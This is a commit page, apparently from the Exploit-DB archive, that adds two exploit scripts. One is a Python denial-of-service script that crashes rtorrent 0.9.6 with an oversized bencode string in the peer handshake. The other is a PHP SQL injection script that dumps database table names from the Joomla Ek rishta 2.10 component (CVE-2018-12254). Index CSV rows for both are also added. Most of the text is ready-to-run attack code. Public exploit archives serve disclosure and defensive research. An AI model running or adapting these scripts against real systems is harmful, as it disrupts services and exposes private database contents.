DB: 2018-06-15
2 changes to exploits/shellcodes rtorrent 0.9.6 - Denial of Service Joomla Component Ek rishta 2.10 - SQL Injection
This commit is contained in:
parent
de3b5004b9
commit
1ccdc79fbd
3 changed files with 96 additions and 0 deletions
40
exploits/linux/dos/44894.py
Executable file
40
exploits/linux/dos/44894.py
Executable file
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: rtorrent 0.9.6 - Denial of Service
|
||||
# Date: 2018-01-10
|
||||
# Exploit Author: ecx86
|
||||
# Vendor Homepage: http://rtorrent.net
|
||||
# Software Link: https://github.com/rakshasa/rtorrent/releases
|
||||
# Version: <= 0.9.6
|
||||
# Tested on: Debian GNU/Linux 9.4 (stretch)
|
||||
|
||||
# This crash is due to a bad bencode parse of the handshake data map.
|
||||
# Specifically, by providing a massive length for a string, namely the key of a map entry,
|
||||
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
|
||||
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
|
||||
# client, or when a downloading rtorrent client connects to a malicious peer.
|
||||
|
||||
#!/usr/bin/env python
|
||||
import socket
|
||||
import struct
|
||||
|
||||
crash = ''
|
||||
proto_name = 'BitTorrent protocol'
|
||||
crash += chr(len(proto_name)) + proto_name # magic
|
||||
crash += '00000000' # reserved extension bytes
|
||||
|
||||
# sha1 hash of info dictionary
|
||||
# change this depending on your torrent
|
||||
crash += '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
|
||||
crash += '00000000000000000000' # peer id
|
||||
|
||||
msg = ''
|
||||
msg += struct.pack('<H', 20) # message type: extended
|
||||
msg += 'd99999999999999999999999999999999:' # payload
|
||||
|
||||
crash += struct.pack('>I', len(msg))
|
||||
crash += msg
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect(('1.3.3.7', 6890))
|
||||
s.send(crash)
|
||||
s.close()
|
54
exploits/php/webapps/44893.php
Normal file
54
exploits/php/webapps/44893.php
Normal file
|
@ -0,0 +1,54 @@
|
|||
# Title: SQL Injection Joomla Component Ek rishta 2.10 - SQL Injection
|
||||
# Date: 2018-06-14
|
||||
# Exploit Author: Guilherme Assmann
|
||||
# Vendor Homepage:https://www.joomla.org/
|
||||
# Version: 2.10
|
||||
# Tested on: MacOSX, Safari, Chrome
|
||||
# Download: https://extensions.joomla.org/extension/ek-rishta/
|
||||
# CVE: CVE-2018-12254
|
||||
|
||||
# Vulnerability Description
|
||||
# To exploit this vulnerability, the user must be logged on to the platform!
|
||||
# the vulnerability allows SQL Injection via the
|
||||
# PATH_INFO to a home/requested_user/Sent%20interest/[username] URI.
|
||||
# more information(en):
|
||||
# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/
|
||||
# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/
|
||||
# more information: https://desecsecurity.com/
|
||||
# exploit code to dump tables:
|
||||
|
||||
<?php
|
||||
|
||||
// CVE-2018-12254
|
||||
|
||||
// after dump the tables, use %60%23table_name%60 to dump columns...
|
||||
|
||||
$host = $argv[1];
|
||||
$cookie = $argv[2];
|
||||
|
||||
// Usage: php exploit.php [http://[HOST]/](http://[host]/) “Cookie: foo=bar”
|
||||
function exploit($host,$ck){
|
||||
$urls = sqli();
|
||||
$ch = curl_init();
|
||||
foreach($urls as $url){
|
||||
curl_setopt($ch,CURLOPT_URL,$host.$url);
|
||||
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
|
||||
curl_setopt($ch,CURLOPT_USERAGENT,":)");
|
||||
curl_setopt($ch,CURLOPT_HTTPHEADER, [$ck]);
|
||||
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,100);
|
||||
curl_setopt($ch,CURLOPT_TIMEOUT,100);
|
||||
$response = curl_exec($ch);
|
||||
$s = strpos($response,"#__");
|
||||
echo substr($response,$s,30)."\n";
|
||||
}
|
||||
}
|
||||
function sqli(){
|
||||
$uri = "/index.php/home/requested_user/Sent%20interest/1'or%20";
|
||||
for($i=0;$i<100;$i++){
|
||||
$value = $i+1;
|
||||
$data[$i] = $uri.str_replace("+","%20",urlencode('extractvalue(0xa,concat(0xa,(select table_name from information_schema.tables where table_schema=database() limit '.$value.',1))) #'));
|
||||
}
|
||||
return $data;
|
||||
}
|
||||
exploit($host,$cookie);
|
||||
?>
|
|
@ -5998,6 +5998,7 @@ id,file,description,date,author,type,platform,port
|
|||
44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple,
|
||||
44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
|
||||
44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
|
||||
44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -39552,3 +39553,4 @@ id,file,description,date,author,type,platform,port
|
|||
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
|
||||
44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
|
||||
44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
|
||||
44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue